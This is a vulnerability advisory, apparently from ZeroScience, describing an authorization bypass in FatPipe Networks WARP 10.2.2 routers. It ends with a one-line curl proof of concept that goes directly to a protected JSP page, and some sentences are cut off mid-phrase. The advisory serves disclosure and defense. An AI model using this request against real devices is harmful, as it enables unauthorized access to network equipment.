FatPipe Networks WARP version 10.2.2 suffers from an authorization bypass vulnerability.
FatPipe Networks WARP 10.2.2 Authorization Bypass
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
Desc: Improper access control occurs when the application provides direct
access to objects based on user-supplied input. As a result of this vulnerability
attackers can bypass authorization and access resources behind protected
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2021-5682
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php
$ curl -vk "https://10.0.0.9/fpui/jsp/index.jsp"